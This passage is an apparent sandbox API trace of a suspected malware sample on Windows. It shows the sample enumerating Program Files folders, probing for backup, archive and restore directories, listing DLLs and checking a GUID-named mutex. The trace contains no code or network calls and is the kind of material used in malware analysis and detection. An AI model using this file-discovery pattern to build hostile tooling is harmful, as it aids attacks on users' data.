ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@坴X企@\x18㟄X\x18\x81")) returned 0xffffffff [0104.126] GetLastError () returned 0x2 [0104.126] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.127] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="archiveX\x10") returned 7 [0104.127] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\") returned 6 [0104.127] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Backup", lpFindFileData=0x18eb8c | 
out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@唜X企@\x18㥼X\x18\x88")) returned 0xffffffff [0104.127] GetLastError () returned 0x2 [0104.127] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.127] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="backup㟀X\x10") returned 6 [0104.127] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\") returned 6 [0104.128] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Reserv", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@坴X企@\x18㟄X\x18\x8f")) returned 0xffffffff [0104.128] GetLastError () returned 0x2 [0104.128] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program 
files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.128] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="reserv㥸X\x10") returned 6 [0104.128] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\") returned 7 [0104.128] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Restore", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@唜X企@\x18㥼X\x18\x97")) returned 0xffffffff [0104.129] GetLastError () returned 0x2 [0104.129] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.129] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="restoreX\x10") returned 7 [0104.129] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.129] SHGetMalloc (in: ppMalloc=0x18edd8 | out: ppMalloc=0x18edd8*=0x767666bc) returned 0x0 [0104.129] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18edd4 | out: 
ppidl=0x18edd4) returned 0x0 [0104.129] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.131] SysReAllocStringLen (in: pbstr=0x18ee5c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18ee5c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.131] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.131] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.131] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.131] GlobalLock (hMem=0x450004) returned 0x588000 [0104.131] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.131] GlobalUnlock (hMem=0x450004) returned 0 [0104.131] GlobalLock (hMem=0x450004) returned 0x588000 [0104.131] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.131] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.131] GlobalUnlock (hMem=0x450004) returned 0 [0104.131] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.131] GlobalUnlock (hMem=0x45000c) returned 0 [0104.131] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*.*", lpFindFileData=0x18eeb0 | out: lpFindFileData=0x18eeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575f28 [0104.132] FindNextFileW (in: hFindFile=0x575f28, lpFindFileData=0x18eeb0 | out: lpFindFileData=0x18eeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.132] FindNextFileW (in: hFindFile=0x575f28, lpFindFileData=0x18eeb0 | out: lpFindFileData=0x18eeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0104.132] GetLastError () returned 0x12 [0104.132] FindClose (in: hFindFile=0x575f28 | out: hFindFile=0x575f28) returned 1 [0104.132] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.132] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.132] GlobalUnlock (hMem=0x45000c) returned 0 [0104.132] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.132] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.132] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.132] GlobalUnlock (hMem=0x45000c) returned 0 [0104.132] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.132] GlobalUnlock (hMem=0x450004) returned 0 [0104.132] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*.*", lpFindFileData=0x18eeb0 | out: lpFindFileData=0x18eeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575f28 [0104.132] FileTimeToLocalFileTime (in: 
lpFileTime=0x18eec4, lpLocalFileTime=0x18edd4 | out: lpLocalFileTime=0x18edd4) returned 1 [0104.133] FileTimeToDosDateTime (in: lpFileTime=0x18edd4, lpFatDate=0x18ee92, lpFatTime=0x18ee90 | out: lpFatDate=0x18ee92, lpFatTime=0x18ee90) returned 1 [0104.133] GlobalLock (hMem=0x450004) returned 0x588000 [0104.133] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.133] GlobalUnlock (hMem=0x450004) returned 0 [0104.133] GlobalLock (hMem=0x450004) returned 0x588000 [0104.133] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.133] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.133] GlobalUnlock (hMem=0x450004) returned 0 [0104.133] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.133] GlobalUnlock (hMem=0x45000c) returned 0 [0104.133] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.133] FindNextFileW (in: hFindFile=0x575f28, lpFindFileData=0x18eeb0 | out: lpFindFileData=0x18eeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.133] FileTimeToLocalFileTime (in: lpFileTime=0x18eec4, lpLocalFileTime=0x18edd0 | out: lpLocalFileTime=0x18edd0) returned 1 [0104.133] FileTimeToDosDateTime (in: lpFileTime=0x18edd0, lpFatDate=0x18ee92, lpFatTime=0x18ee90 | out: lpFatDate=0x18ee92, lpFatTime=0x18ee90) returned 1 [0104.133] GlobalLock (hMem=0x45000c) returned 0x589008 [0104.133] GlobalHandle (pMem=0x589008) returned 0x45000c [0104.133] GlobalUnlock (hMem=0x45000c) returned 0 [0104.133] GlobalLock (hMem=0x45000c) returned 0x589008 [0104.134] GlobalLock (hMem=0x450004) returned 0x58b018 [0104.134] GlobalHandle (pMem=0x589008) returned 0x45000c 
[0104.134] GlobalUnlock (hMem=0x45000c) returned 0 [0104.134] GlobalHandle (pMem=0x58b018) returned 0x450004 [0104.134] GlobalUnlock (hMem=0x450004) returned 0 [0104.134] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.134] FindNextFileW (in: hFindFile=0x575f28, lpFindFileData=0x18eeb0 | out: lpFindFileData=0x18eeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0104.134] GetLastError () returned 0x12 [0104.134] FindClose (in: hFindFile=0x575f28 | out: hFindFile=0x575f28) returned 1 [0104.134] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x8b840, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceca35.dll", cAlternateFileName="SQLCEC~1.DLL")) returned 1 [0104.134] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.134] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.135] GlobalLock (hMem=0x450004) returned 0x588000 [0104.135] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.135] GlobalUnlock (hMem=0x450004) returned 0 [0104.135] GlobalLock (hMem=0x450004) returned 0x588000 [0104.135] GlobalLock (hMem=0x45000c) returned 
0x58a010 [0104.135] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.135] GlobalUnlock (hMem=0x450004) returned 0 [0104.135] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.135] GlobalUnlock (hMem=0x45000c) returned 0 [0104.135] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.135] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x1d040, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcecompact35.dll", cAlternateFileName="SQLCEC~2.DLL")) returned 1 [0104.135] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.135] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.137] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.137] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.137] GlobalUnlock (hMem=0x45000c) returned 0 [0104.137] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.137] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.137] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.137] GlobalUnlock (hMem=0x45000c) returned 0 [0104.137] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.137] GlobalUnlock (hMem=0x450004) returned 0 [0104.138] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.138] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, 
ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x24440, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceer35EN.dll", cAlternateFileName="SQLCEE~1.DLL")) returned 1 [0104.138] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.138] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.138] GlobalLock (hMem=0x450004) returned 0x588000 [0104.138] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.138] GlobalUnlock (hMem=0x450004) returned 0 [0104.138] GlobalLock (hMem=0x450004) returned 0x588000 [0104.138] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.138] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.138] GlobalUnlock (hMem=0x450004) returned 0 [0104.138] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.138] GlobalUnlock (hMem=0x45000c) returned 0 [0104.138] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.138] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab958d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x15a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceme35.dll", cAlternateFileName="SQLCEM~1.DLL")) returned 1 [0104.138] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.138] FileTimeToDosDateTime (in: lpFileTime=0x18f110, 
lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.138] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.138] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.139] GlobalUnlock (hMem=0x45000c) returned 0 [0104.139] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.139] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.139] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.139] GlobalUnlock (hMem=0x45000c) returned 0 [0104.139] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.139] GlobalUnlock (hMem=0x450004) returned 0 [0104.139] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.139] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x3fa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceoledb35.dll", cAlternateFileName="SQLCEO~1.DLL")) returned 1 [0104.139] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.139] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.139] GlobalLock (hMem=0x450004) returned 0x588000 [0104.139] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.139] GlobalUnlock (hMem=0x450004) returned 0 [0104.139] GlobalLock (hMem=0x450004) returned 0x588000 [0104.139] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.139] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.139] GlobalUnlock (hMem=0x450004) returned 0 [0104.139] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.139] 
GlobalUnlock (hMem=0x45000c) returned 0 [0104.140] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.140] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3caa70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x114e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceqp35.dll", cAlternateFileName="SQLCEQ~1.DLL")) returned 1 [0104.140] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.140] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.140] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.140] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.140] GlobalUnlock (hMem=0x45000c) returned 0 [0104.140] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.140] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.140] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.140] GlobalUnlock (hMem=0x45000c) returned 0 [0104.140] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.140] GlobalUnlock (hMem=0x450004) returned 0 [0104.140] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.140] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, 
nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 1 [0104.140] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.140] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.140] GlobalLock (hMem=0x450004) returned 0x588000 [0104.141] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.141] GlobalUnlock (hMem=0x450004) returned 0 [0104.141] GlobalLock (hMem=0x450004) returned 0x588000 [0104.141] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.141] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.141] GlobalUnlock (hMem=0x450004) returned 0 [0104.141] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.141] GlobalUnlock (hMem=0x45000c) returned 0 [0104.141] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.141] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 0 [0104.141] GetLastError () returned 0x12 [0104.141] FindClose (in: hFindFile=0x575030 | out: hFindFile=0x575030) returned 1 [0104.142] FindNextFileW (in: hFindFile=0x56ed00, lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0104.142] GetLastError () returned 0x12 [0104.142] FindClose (in: hFindFile=0x56ed00 | out: hFindFile=0x56ed00) returned 1 [0104.142] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.142] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=37, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\矋\x18￾￿F") returned 37 [0104.142] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Adobe\\F") returned 6 [0104.143] FindFirstFileW (in: lpFileName="C:\\Program Files\\Adobe", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0x1d301bf, ftCreationTime.dwLowDateTime=0x6d3a4910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x330076, nFileSizeLow=0x35002e, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="㷴V䱠@㎌W企@\x18㤄X頻\x18q")) returned 0xffffffff [0104.143] GetLastError () returned 0x2 [0104.143] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.143] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="adobe\\絠X`") returned 6 [0104.143] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Oracle\\") 
